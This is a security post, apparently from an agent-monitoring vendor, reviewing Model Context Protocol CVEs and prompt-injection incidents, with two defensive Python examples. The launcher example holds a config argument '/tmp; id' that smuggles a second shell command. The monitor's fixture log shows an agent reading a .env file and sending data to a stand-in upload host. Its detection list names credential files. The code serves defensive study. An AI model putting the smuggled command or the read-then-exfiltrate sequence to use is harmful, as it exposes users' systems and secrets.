Between January and April 2026, researchers disclosed over 40 CVEs against Model Context Protocol implementations across Python, TypeScript, Java, and Rust SDKs. The vulnerabilities affect Anthropic's reference servers, third-party tools with 150 million combined downloads, and 9 of 11 MCP marketplaces.
This post is cross-published from agentlair.dev.
Timeline of Vulnerabilities
2025 Incidents:
- April: WhatsApp tool poisoning attack
- May: GitHub MCP prompt injection
- June: Asana cross-tenant exposure; CVE-2025-49596 (CVSS 9.4)
- July: CVE-2025-6514 (437,000+ downloads affected, CVSS 9.6)
- August: Filesystem sandbox escape
- September: Postmark supply chain attack
- October: Smithery path traversal
2026 Escalation:
January–February saw 30+ CVEs filed in 60 days. January 20 marked three vulnerabilities in Anthropic's mcp-server-git reference implementation. April's Ox Security advisory detailed 10 high/critical CVEs, with 200,000 vulnerable servers estimated.
Vulnerability Breakdown
| Category | Share |
|---|---|
| Shell/exec injection | 43% |
| Tooling infrastructure flaws | 20% |
| Authentication bypass | 13% |
| Path traversal | 10% |
| Other (SSRF, supply chain) | 14% |
Root Cause: The STDIO Problem
MCP uses STDIO as its primary transport without sanitizing spawned command strings. The protocol's subprocess-based architecture makes command execution the default interface, inherited by every implementation. Four attack vectors emerged:
- Unauthenticated command injection via STDIO invocations
- Injection bypassing developer hardening measures
- Zero-click prompt injection in AI IDEs
- Marketplace poisoning via malicious MCP uploads
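The first two vectors share one mechanism: a host reads a server entry (command plus arguments) from configuration and spawns it over STDIO. If the host joins those values into a single shell string, a value that came from an untrusted project config or marketplace listing is re-parsed by the shell. The following is an added example, not code from the post or from any MCP SDK; the config shape, the allowlist and the server names are constructed for illustration. It shows the unsafe string-building pattern beside a hardened launcher that allowlists the binary, rejects arguments that look tampered, and passes an argv list with `shell=False`.

```python
import subprocess

# Constructed MCP-style server entries in the shape hosts commonly read from
# a config file: a command plus an argument list. The second entry carries a
# shell metacharacter in a value, as could arrive from an untrusted
# project-level config or marketplace listing. (Constructed sample data.)
SERVER_CONFIGS = {
    "git": {"command": "mcp-server-git", "args": ["--repository", "/srv/repo"]},
    "untrusted": {"command": "mcp-server-fs", "args": ["/tmp; id"]},
}

# Allowlist of server binaries this host is willing to spawn (assumed policy).
ALLOWED_COMMANDS = {"mcp-server-git", "mcp-server-fs"}
SHELL_METACHARACTERS = set(";|&$`<>\n")


def build_shell_string(cfg):
    """Unsafe pattern: join config values into one string for shell=True.
    The shell re-parses the string, so '/tmp; id' becomes a second command."""
    return f"{cfg['command']} {' '.join(cfg['args'])}"


def build_argv(cfg):
    """Hardened pattern: allowlist the binary, reject arguments that look
    tampered, and return an argv list for shell=False. Raises ValueError
    rather than spawning anything."""
    command = cfg["command"]
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowlisted: {command!r}")
    argv = [command]
    for arg in cfg["args"]:
        if not isinstance(arg, str) or SHELL_METACHARACTERS & set(arg):
            raise ValueError(f"rejected argument: {arg!r}")
        argv.append(arg)
    return argv


def spawn_stdio_server(cfg):
    """Spawn the server over STDIO pipes with shell=False: the argv strings
    reach the kernel exactly as listed, and no shell parsing happens."""
    return subprocess.Popen(build_argv(cfg), stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, shell=False)


def classify_configs(configs):
    """Report which entries the hardened path would spawn and which it rejects."""
    verdicts = {}
    for name, cfg in configs.items():
        try:
            verdicts[name] = ("ok", build_argv(cfg))
        except ValueError as exc:
            verdicts[name] = ("rejected", str(exc))
    return verdicts


if __name__ == "__main__":
    # Dry run: classify only, never spawn, so the script is safe to execute.
    for name, verdict in classify_configs(SERVER_CONFIGS).items():
        print(name, verdict)
```

With `shell=False` the metacharacters are inert at the shell layer regardless of the argument check; the check exists so that a config entry which looks edited fails loudly instead of being silently passed to the server, and the allowlist is what prevents an arbitrary binary from being launched at all. Per-argument validation for each allowed server (for example, that a repository path resolves inside an expected root) is the natural next layer and is left out here.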
Anthropic's Response
Anthropic declined architectural modifications, characterizing the behavior as "expected" and placing sanitization responsibility on developers—despite survey data showing 82% of 2,614 implementations vulnerable to path traversal and 67% carrying injection risk.
Detection Gaps
Static analysis catches known patterns but misses sequence-level attacks in which individually authorized tool calls combine into an exfiltration pipeline. The infrastructure gap is behavioral monitoring of what an agent does after authorization.
Recommended Actions
- Immediate: Block public IP access; sandbox MCP services; treat external configuration as untrusted
- Structural: Implement behavioral monitoring tracking agent action sequences against baseline patterns
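The detection gap above and the structural recommendation here describe the same control: watch the sequence of agent tool calls rather than each call in isolation, and compare it against a baseline. The following is an added example, not code from the post or from AgentLair; the log format, tool names, tool classes and sensitive-path markers are assumed for illustration. It learns a baseline of consecutive tool pairs from a known-good run, then scans a second run and flags both a pair never seen before and an egress-class call that follows a read of a secret-bearing path within a short window, which is how two authorized calls compose into exfiltration.

```python
import json
from collections import deque

# Coarse classes for tools: the detector reasons about classes, not names,
# so a new tool with the same effect is still covered. Assumed mapping.
TOOL_CLASSES = {
    "list_directory": "read",
    "read_file": "read",
    "git_log": "read",
    "fetch_url": "egress",
    "send_email": "egress",
}

# Substrings that mark a read as touching secrets (assumed policy list).
SENSITIVE_MARKERS = (".env", "id_rsa", ".aws/credentials", "secrets")

# Constructed tool-call logs, one JSON object per line, in the shape an
# MCP host could emit. Every call in both logs is individually authorized.
BASELINE_LOG = """\
{"ts": "2026-04-01T10:00:00Z", "agent": "ide-agent", "tool": "list_directory", "args": {"path": "/workspace"}}
{"ts": "2026-04-01T10:00:02Z", "agent": "ide-agent", "tool": "read_file", "args": {"path": "/workspace/README.md"}}
{"ts": "2026-04-01T10:00:05Z", "agent": "ide-agent", "tool": "git_log", "args": {"repo": "/workspace"}}
{"ts": "2026-04-01T10:00:09Z", "agent": "ide-agent", "tool": "read_file", "args": {"path": "/workspace/src/main.py"}}
{"ts": "2026-04-01T10:00:15Z", "agent": "ide-agent", "tool": "fetch_url", "args": {"url": "https://docs.example.com/api"}}
"""

SUSPECT_LOG = """\
{"ts": "2026-04-02T09:00:00Z", "agent": "ide-agent", "tool": "list_directory", "args": {"path": "/workspace"}}
{"ts": "2026-04-02T09:00:01Z", "agent": "ide-agent", "tool": "read_file", "args": {"path": "/workspace/.env"}}
{"ts": "2026-04-02T09:00:02Z", "agent": "ide-agent", "tool": "fetch_url", "args": {"url": "https://example.invalid/upload"}}
{"ts": "2026-04-02T09:00:03Z", "agent": "ide-agent", "tool": "send_email", "args": {"to": "someone@example.invalid"}}
"""


def parse_log(text):
    """Parse JSON-lines tool-call events; skip blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_sensitive_read(event):
    """True when a read-class tool's arguments mention a secret-bearing path."""
    if TOOL_CLASSES.get(event["tool"]) != "read":
        return False
    blob = json.dumps(event["args"])
    return any(marker in blob for marker in SENSITIVE_MARKERS)


def learn_baseline(events):
    """Baseline = set of consecutive tool pairs (bigrams) seen in known-good runs."""
    return {(a["tool"], b["tool"]) for a, b in zip(events, events[1:])}


def detect(events, baseline, window=3):
    """Walk the call sequence and flag two things:
    - novel_sequence: a consecutive tool pair never seen in the baseline;
    - read_then_egress: an egress-class call within `window` calls after a
      sensitive read, i.e. authorized reads and sends composing a pipeline."""
    findings = []
    recent = deque(maxlen=window)
    prev = None
    for idx, event in enumerate(events):
        if prev is not None and (prev["tool"], event["tool"]) not in baseline:
            findings.append({"type": "novel_sequence", "index": idx,
                             "pair": (prev["tool"], event["tool"]), "ts": event["ts"]})
        if TOOL_CLASSES.get(event["tool"]) == "egress":
            sources = [r["args"] for r in recent if is_sensitive_read(r)]
            if sources:
                findings.append({"type": "read_then_egress", "index": idx,
                                 "tool": event["tool"], "sources": sources, "ts": event["ts"]})
        recent.append(event)
        prev = event
    return findings


def run_demo():
    """Learn from the baseline log, then scan the suspect log."""
    baseline = learn_baseline(parse_log(BASELINE_LOG))
    return detect(parse_log(SUSPECT_LOG), baseline)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Note that the `read_file` followed by `fetch_url` pair in the suspect run is also present in the baseline, so a pattern-only check passes it; the pipeline is only visible when the read's target and the later egress are considered together, which is the point of the windowed rule. In practice the window would be time-based, the baseline learned per agent identity, and the classes and markers maintained as policy.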
Key Statistic: One CVE filed approximately every four days throughout 2026.
AgentLair provides behavioral trust infrastructure for AI agents — persistent identity, credential isolation, and continuous behavioral monitoring.